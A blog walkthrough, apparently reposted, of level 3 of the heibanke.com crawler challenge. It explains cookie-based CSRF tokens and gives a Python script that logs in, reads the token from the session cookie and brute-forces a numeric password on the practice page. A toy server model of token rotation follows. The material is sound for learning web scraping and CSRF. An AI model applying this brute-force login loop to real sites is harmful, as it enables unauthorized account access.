  • Heibanke -- Crawler Challenge -- Level 03

    Crawler challenge links:


    1.  http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex02/


    2.  http://www.heibanke.com/accounts/login


    Key points: cookie & session, csrf, Web programming


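    Hint: this level has two login URLs, and logging in through them gives completely different results. When you are first redirected here, URL 1 is shown; after registering you are redirected to URL 2. Only logging in at the original URL 1, with the account and password registered previously, takes you to the correct challenge page. It has nothing to do with that billing report page!!! Each login dynamically assigns a different CSRF token, stored in a cookie, which has to be extracted dynamically in code.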


    Reference code:


    #!/usr/bin/env python3
    # encoding: utf-8

    import requests

    csrf = ""
    username = "Peter"
    password = "112233"
    pw = "0"

    # The csrfmiddlewaretoken fields are filled in at run time from the cookie.
    payload_login = {
        "username": username,
        "password": password,
        "csrfmiddlewaretoken": csrf
    }

    payload_attack = {
        "username": username,
        "password": pw,
        "csrfmiddlewaretoken": csrf
    }

    website_signUp = "http://www.heibanke.com/accounts/login"
    website_login = "http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex02/"

    s = requests.Session()
    # GET first so the server sets the csrftoken cookie in the session.
    s.get(website_signUp)
    csrf = s.cookies["csrftoken"]
    payload_login["csrfmiddlewaretoken"] = csrf
    # Log in through URL 1 with the registered account.
    s.post(website_login, data=payload_login)
    csrf = s.cookies["csrftoken"]

    # Request the login URL again, then read the token from the session cookie.
    s.post(website_login)
    payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
    for i in range(31):
        payload_attack["password"] = str(i)
        resp = s.post("http://www.heibanke.com/lesson/crawler_ex02/", data=payload_attack)
        # The page contains "错误" when the submitted password is wrong.
        if "错误".encode("utf-8") not in resp.content:
            print("[+]FOUND : " + payload_attack["password"])
            print("\n\nText: \n\n" + resp.text)
            break
        else:
            print(payload_attack["password"])
            continue
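
The server side of the hint above, as an added example (not the original author's code and not heibanke.com's implementation): a toy model of a cookie-based CSRF check that rotates the token on login, which is why a client must re-read `csrftoken` from the cookie after logging in. The `Server` class, its methods, the `jar` dict and the `alice` account are constructed for illustration; only the `csrftoken` cookie and `csrfmiddlewaretoken` field names come from the page.

```python
import hmac
import secrets

def _eq(a, b):
    # Constant-time comparison; encode so non-ASCII input cannot raise.
    return hmac.compare_digest(a.encode(), b.encode())

class Server:
    """Toy model (hypothetical names) of a cookie-based CSRF check."""

    def __init__(self, users):
        self.users = users      # constructed sample credentials
        self.sessions = set()   # issued session ids

    def get(self, cookies):
        # A GET hands out a csrftoken cookie if the client has none yet.
        cookies.setdefault("csrftoken", secrets.token_hex(16))
        return 200

    def _csrf_ok(self, cookies, form):
        # The form field must repeat the cookie value exactly.
        cookie = cookies.get("csrftoken", "")
        return bool(cookie) and _eq(cookie, form.get("csrfmiddlewaretoken", ""))

    def login(self, cookies, form):
        if not self._csrf_ok(cookies, form):
            return 403
        user, pw = form.get("username"), form.get("password", "")
        if user not in self.users or not _eq(self.users[user], pw):
            return 401
        cookies["sessionid"] = secrets.token_hex(16)
        self.sessions.add(cookies["sessionid"])
        # Rotate on login: a token captured before login stops working.
        cookies["csrftoken"] = secrets.token_hex(16)
        return 200

    def submit(self, cookies, form):
        if cookies.get("sessionid") not in self.sessions:
            return 401
        return 200 if self._csrf_ok(cookies, form) else 403

def demo():
    server, jar = Server({"alice": "s3cret"}), {}   # jar plays the cookie jar
    server.get(jar)
    old = jar["csrftoken"]
    creds = {"username": "alice", "password": "s3cret"}
    no_token = server.login(jar, dict(creds))
    logged_in = server.login(jar, dict(creds, csrfmiddlewaretoken=old))
    stale = server.submit(jar, {"csrfmiddlewaretoken": old})
    fresh = server.submit(jar, {"csrfmiddlewaretoken": jar["csrftoken"]})
    return no_token, logged_in, stale, fresh
```

`demo()` returns the status codes for a login without a token, a login with the token, a post-login submit with the pre-login token, and a submit with the token re-read from the cookie.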
    
    


  • Original article: https://www.cnblogs.com/csnd/p/12897057.html